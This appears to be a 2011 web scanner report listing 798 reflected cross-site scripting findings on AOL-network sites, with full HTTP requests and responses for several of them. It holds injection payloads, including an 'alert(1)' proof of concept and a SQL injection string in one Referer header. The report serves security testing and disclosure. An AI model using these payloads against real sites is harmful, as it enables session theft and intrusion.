1.625. http://www.shelterpop.com/category/famous-homes/ [REST URL parameter 2]

1.626. http://www.shelterpop.com/category/famous-homes/ [name of an arbitrarily supplied request parameter]

1.627. http://www.shelterpop.com/category/fun-stuff/ [REST URL parameter 2]

1.628. http://www.shelterpop.com/category/fun-stuff/ [REST URL parameter 2]

1.629. http://www.shelterpop.com/category/fun-stuff/ [name of an arbitrarily supplied request parameter]

1.630. http://www.shelterpop.com/category/gardening/ [REST URL parameter 2]

1.631. http://www.shelterpop.com/category/gardening/ [REST URL parameter 2]

1.632. http://www.shelterpop.com/category/gardening/ [name of an arbitrarily supplied request parameter]

1.633. http://www.slashfood.com/ [name of an arbitrarily supplied request parameter]

1.634. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [REST URL parameter 2]

1.635. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [REST URL parameter 3]

1.636. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [cid parameter]

1.637. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [cid parameter]

1.638. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [cid parameter]

1.639. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [name of an arbitrarily supplied request parameter]

1.640. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [name of an arbitrarily supplied request parameter]

1.641. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [REST URL parameter 2]

1.642. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [REST URL parameter 3]

1.643. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [cid parameter]

1.644. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [cid parameter]

1.645. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [cid parameter]

1.646. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [name of an arbitrarily supplied request parameter]

1.647. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [name of an arbitrarily supplied request parameter]

1.648. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [REST URL parameter 2]

1.649. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [REST URL parameter 3]

1.650. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [cid parameter]

1.651. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [cid parameter]

1.652. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [cid parameter]

1.653. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [name of an arbitrarily supplied request parameter]

1.654. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [name of an arbitrarily supplied request parameter]

1.655. http://www.spinner.com/2011/02/01/super-bowl-halftime-show/ [REST URL parameter 3]

1.656. http://www.stylelist.com/ [name of an arbitrarily supplied request parameter]

1.657. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]

1.658. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]

1.659. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]

1.660. http://www.stylelist.com/hair/ [name of an arbitrarily supplied request parameter]

1.661. http://www.stylelist.com/hair/ [name of an arbitrarily supplied request parameter]

1.662. http://www.switched.com/ [name of an arbitrarily supplied request parameter]

1.663. http://www.switched.com/2011/02/05/do-ipad-magazines-take-too-long-to-download/ [name of an arbitrarily supplied request parameter]

1.664. http://www.switched.com/2011/02/05/switched-roundup-top-posts-this-week/ [name of an arbitrarily supplied request parameter]

1.665. http://www.switched.com/2011/02/06/the-wii-plays-takes-gameplay-to-the-live-stage/ [name of an arbitrarily supplied request parameter]

1.666. http://www.switched.com/tag/justtellmewhattoget [REST URL parameter 2]

1.667. http://www.switched.com/tag/justtellmewhattoget [REST URL parameter 2]

1.668. http://www.switched.com/tag/justtellmewhattoget [name of an arbitrarily supplied request parameter]

1.669. http://www.thatsfit.com/ [name of an arbitrarily supplied request parameter]

1.670. http://www.thatsfit.com/category/diet-and-weight-loss/ [REST URL parameter 2]

1.671. http://www.thatsfit.com/category/diet-and-weight-loss/ [name of an arbitrarily supplied request parameter]

1.672. http://www.thatsfit.com/category/fit-travel/ [REST URL parameter 2]

1.673. http://www.thatsfit.com/category/fit-travel/ [name of an arbitrarily supplied request parameter]

1.674. http://www.tuaw.com/ [name of an arbitrarily supplied request parameter]

1.675. http://www.tuaw.com/2011/02/05/in-arlington-tx-try-the-official-super-bowl-app/ [name of an arbitrarily supplied request parameter]

1.676. http://www.tuaw.com/2011/02/06/app-reviews-stratego-vs-the-general/ [name of an arbitrarily supplied request parameter]

1.677. http://www.tuaw.com/2011/02/06/mobile-version-of-itunes-store-gets-genius-recommendations/ [name of an arbitrarily supplied request parameter]

1.678. http://www.tvsquad.com/category/tv-replay [REST URL parameter 2]

1.679. http://www.tvsquad.com/category/tv-replay [REST URL parameter 2]

1.680. http://www.walletpop.com/2011/02/01/amazon-fights-to-keep-sales-tax-advantage-in-tennessee/ [REST URL parameter 1]

1.681. http://www.walletpop.com/2011/02/03/1040-tax-forms-which-one-should-you-use/ [REST URL parameter 1]

1.682. http://www.walletpop.com/2011/02/03/government-issues-recall-of-another-lethal-crib/ [REST URL parameter 1]

1.683. http://www.walletpop.com/2011/02/04/a-tax-credit-for-savers-do-you-qualify/ [REST URL parameter 1]

1.684. http://www.walletpop.com/2011/02/04/help-my-tax-documents-are-late/ [REST URL parameter 1]

1.685. http://www.walletpop.com/2011/02/05/wine-deals-for-valentines-day/ [REST URL parameter 1]

1.686. http://www.walletpop.com/banking [REST URL parameter 1]

1.687. http://www.walletpop.com/banking/ [REST URL parameter 1]

1.688. http://www.walletpop.com/blog/category/fantastic-freebies/ [REST URL parameter 1]

1.689. http://www.walletpop.com/blog/category/fantastic-freebies/ [REST URL parameter 2]

1.690. http://www.walletpop.com/blog/category/fantastic-freebies/ [REST URL parameter 3]

1.691. http://www.walletpop.com/blog/media/awards_promo_bottom.gif [REST URL parameter 1]

1.692. http://www.walletpop.com/blog/media/awards_promo_bottom.gif [REST URL parameter 2]

1.693. http://www.walletpop.com/blog/media/awards_promo_bottom.gif [REST URL parameter 3]

1.694. http://www.walletpop.com/blog/media/awards_promo_middle.gif [REST URL parameter 1]

1.695. http://www.walletpop.com/blog/media/awards_promo_middle.gif [REST URL parameter 2]

1.696. http://www.walletpop.com/blog/media/awards_promo_middle.gif [REST URL parameter 3]

1.697. http://www.walletpop.com/calculators [REST URL parameter 1]

1.698. http://www.walletpop.com/category/debt/ [REST URL parameter 1]

1.699. http://www.walletpop.com/category/debt/ [REST URL parameter 2]

1.700. http://www.walletpop.com/category/fraud/ [REST URL parameter 1]

1.701. http://www.walletpop.com/category/fraud/ [REST URL parameter 2]

1.702. http://www.walletpop.com/category/insurance/ [REST URL parameter 1]

1.703. http://www.walletpop.com/category/insurance/ [REST URL parameter 2]

1.704. http://www.walletpop.com/category/loans/ [REST URL parameter 1]

1.705. http://www.walletpop.com/category/loans/ [REST URL parameter 2]

1.706. http://www.walletpop.com/category/recalls/ [REST URL parameter 1]

1.707. http://www.walletpop.com/category/recalls/ [REST URL parameter 2]

1.708. http://www.walletpop.com/category/retire/ [REST URL parameter 1]

1.709. http://www.walletpop.com/category/retire/ [REST URL parameter 2]

1.710. http://www.walletpop.com/college-finance [REST URL parameter 1]

1.711. http://www.walletpop.com/college-finance/ [REST URL parameter 1]

1.712. http://www.walletpop.com/credit [REST URL parameter 1]

1.713. http://www.walletpop.com/credit/ [REST URL parameter 1]

1.714. http://www.walletpop.com/credit/credit-cards/ [REST URL parameter 1]

1.715. http://www.walletpop.com/credit/credit-cards/ [REST URL parameter 2]

1.716. http://www.walletpop.com/crib-recall [REST URL parameter 1]

1.717. http://www.walletpop.com/debt [REST URL parameter 1]

1.718. http://www.walletpop.com/debt/ [REST URL parameter 1]

1.719. http://www.walletpop.com/fraud [REST URL parameter 1]

1.720. http://www.walletpop.com/insurance [REST URL parameter 1]

1.721. http://www.walletpop.com/insurance/ [REST URL parameter 1]

1.722. http://www.walletpop.com/loans [REST URL parameter 1]

1.723. http://www.walletpop.com/loans/ [REST URL parameter 1]

1.724. http://www.walletpop.com/mortgages [REST URL parameter 1]

1.725. http://www.walletpop.com/mortgages/ [REST URL parameter 1]

1.726. http://www.walletpop.com/mortgages/refinancing [REST URL parameter 1]

1.727. http://www.walletpop.com/mortgages/refinancing [REST URL parameter 2]

1.728. http://www.walletpop.com/recalls [REST URL parameter 1]

1.729. http://www.walletpop.com/recession [REST URL parameter 1]

1.730. http://www.walletpop.com/retirement [REST URL parameter 1]

1.731. http://www.walletpop.com/retirement/ [REST URL parameter 1]

1.732. http://www.walletpop.com/specials [REST URL parameter 1]

1.733. http://www.walletpop.com/taxes [REST URL parameter 1]

1.734. http://www.walletpop.com/taxes [name of an arbitrarily supplied request parameter]

1.735. http://www.walletpop.com/taxes/ [REST URL parameter 1]

1.736. http://www.walletpop.com/taxes/ [name of an arbitrarily supplied request parameter]

1.737. http://www.walletpop.com/taxes/advice [REST URL parameter 1]

1.738. http://www.walletpop.com/taxes/advice [REST URL parameter 2]

1.739. http://www.walletpop.com/taxes/advice [name of an arbitrarily supplied request parameter]

1.740. http://www.walletpop.com/taxes/advice/ [REST URL parameter 1]

1.741. http://www.walletpop.com/taxes/advice/ [REST URL parameter 2]

1.742. http://www.walletpop.com/taxes/advice/ [name of an arbitrarily supplied request parameter]

1.743. http://www.walletpop.com/taxes/article/10-most-common-tax-mistakes-to-avoid/888611 [REST URL parameter 2]

1.744. http://www.walletpop.com/taxes/article/10-most-common-tax-mistakes-to-avoid/888611 [REST URL parameter 3]

1.745. http://www.walletpop.com/taxes/article/10-most-common-tax-mistakes-to-avoid/888611 [REST URL parameter 4]

1.746. http://www.walletpop.com/taxes/basics [REST URL parameter 1]

1.747. http://www.walletpop.com/taxes/basics [REST URL parameter 2]

1.748. http://www.walletpop.com/taxes/basics [name of an arbitrarily supplied request parameter]

1.749. http://www.walletpop.com/taxes/basics/ [REST URL parameter 1]

1.750. http://www.walletpop.com/taxes/basics/ [REST URL parameter 2]

1.751. http://www.walletpop.com/taxes/basics/ [name of an arbitrarily supplied request parameter]

1.752. http://www.walletpop.com/taxes/credit [REST URL parameter 1]

1.753. http://www.walletpop.com/taxes/credit [REST URL parameter 2]

1.754. http://www.walletpop.com/taxes/credit [name of an arbitrarily supplied request parameter]

1.755. http://www.walletpop.com/taxes/credit/ [REST URL parameter 1]

1.756. http://www.walletpop.com/taxes/credit/ [REST URL parameter 2]

1.757. http://www.walletpop.com/taxes/credit/ [name of an arbitrarily supplied request parameter]

1.758. http://www.walletpop.com/taxes/forms [REST URL parameter 1]

1.759. http://www.walletpop.com/taxes/forms [REST URL parameter 2]

1.760. http://www.walletpop.com/taxes/forms [name of an arbitrarily supplied request parameter]

1.761. http://www.walletpop.com/taxes/forms/ [REST URL parameter 1]

1.762. http://www.walletpop.com/taxes/forms/ [REST URL parameter 2]

1.763. http://www.walletpop.com/taxes/forms/ [name of an arbitrarily supplied request parameter]

1.764. http://www.walletpop.com/taxes/online [REST URL parameter 1]

1.765. http://www.walletpop.com/taxes/online [REST URL parameter 2]

1.766. http://www.walletpop.com/taxes/online [name of an arbitrarily supplied request parameter]

1.767. http://www.walletpop.com/taxes/online/ [REST URL parameter 1]

1.768. http://www.walletpop.com/taxes/online/ [REST URL parameter 2]

1.769. http://www.walletpop.com/taxes/online/ [name of an arbitrarily supplied request parameter]

1.770. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.771. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

1.772. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

1.773. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.774. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p85001580 cookie]

1.775. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

1.776. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

1.777. http://ar.voicefive.com/bmx3/broker.pli [ar_p68511049 cookie]

1.778. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

1.779. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

1.780. http://blackvoices.aol.com/ [name of an arbitrarily supplied request parameter]

1.781. http://body.aol.com/diet-fitness [name of an arbitrarily supplied request parameter]

1.782. http://body.aol.com/health [name of an arbitrarily supplied request parameter]

1.783. http://massively.com/ [name of an arbitrarily supplied request parameter]

1.784. http://memberdirectory.aol.com/aolus/searchProfiles [REST URL parameter 2]

1.785. http://mmafighting.com/ [name of an arbitrarily supplied request parameter]

1.786. http://new.mapquest.com/accelerator [name of an arbitrarily supplied request parameter]

1.787. http://new.mapquest.com/directions [name of an arbitrarily supplied request parameter]

1.788. http://new.mapquest.com/routeplanner [name of an arbitrarily supplied request parameter]

1.789. http://ocp.cbs.com/pacific/Response.jsp [_PACIFIC_COMMENTS cookie]

1.790. http://reference.aol.com/atlas [name of an arbitrarily supplied request parameter]

1.791. http://seed.com/ [name of an arbitrarily supplied request parameter]

1.792. http://switched.com/ [name of an arbitrarily supplied request parameter]

1.793. http://www.downloadsquad.com/ [name of an arbitrarily supplied request parameter]

1.794. http://www.greendaily.com/ [name of an arbitrarily supplied request parameter]

1.795. http://www.holidash.com/ [name of an arbitrarily supplied request parameter]

1.796. http://www.kol.com/ [name of an arbitrarily supplied request parameter]

1.797. http://www.massively.com/ [name of an arbitrarily supplied request parameter]

1.798. http://www.new.mapquest.com/ [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 798 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3015e"%3bc03e6044435 was submitted in the REST URL parameter 1. This input was echoed as 3015e";c03e6044435 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork3015e"%3bc03e6044435/aol_pp HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240247308.3021032781.3908175104; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:46 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10535
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm02 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm02.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork3015e";c03e6044435";
s_265.prop2="aol_pp";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.2. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b307b"%3b18c402aedf2 was submitted in the REST URL parameter 1. This input was echoed as b307b";18c402aedf2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetworkb307b"%3b18c402aedf2/aolcom_terms HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.3642051917.360777472; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:46 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10547
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm29.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworkb307b";18c402aedf2";
s_265.prop2="aolcom_terms";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.3. http://about.aol.com/aolnetwork/mem_tos [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/mem_tos

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6d7d"%3b33da55b5274 was submitted in the REST URL parameter 1. This input was echoed as a6d7d";33da55b5274 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetworka6d7d"%3b33da55b5274/mem_tos HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.789990733.3773433344; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:46 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10537
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm30.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworka6d7d";33da55b5274";
s_265.prop2="mem_tos";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.4. http://about.aol.com/aolnetwork/trademarks [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/trademarks

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba4d3"%3b0da027c5667 was submitted in the REST URL parameter 1. This input was echoed as ba4d3";0da027c5667 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetworkba4d3"%3b0da027c5667/trademarks HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.3642051917.528549632; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:47 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10541
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm29.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworkba4d3";0da027c5667";
s_265.prop2="trademarks";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.5. http://about.aol.com/sitemap/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2cb1"%3b0c58d64b746 was submitted in the REST URL parameter 1. This input was echoed as b2cb1";0c58d64b746 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemapb2cb1"%3b0c58d64b746/ HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
Referer: http://latino.aol.com/$%7C.ivillage.com.*/1%7Cwww.ivillage.com/(celeb-news%7Centertainment-photos%7Ctv%7Cfor-kids%7Cvideo%7Centertainment%7Cmovies%7Cfood%7Crecipes%7Ctable-talk%7Cfood-for-kids%7Cfood-advice%7Cfood-news%7Cfood-video?110145548'%20or%201%3d1--%20=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.3642051917.1132070656; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:12:18 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Cteonnt-Length: 10499
Connection: close
Content-Length: 10499


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm29.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="sitemapb2cb1";0c58d64b746";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.6. http://ad.aggregateknowledge.com/iframe!t=639! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=639!

Issue detail

The value of the clk1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c48dd"%3balert(1)//51cb3eab07a was submitted in the clk1 parameter. This input was echoed as c48dd";alert(1)//51cb3eab07a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

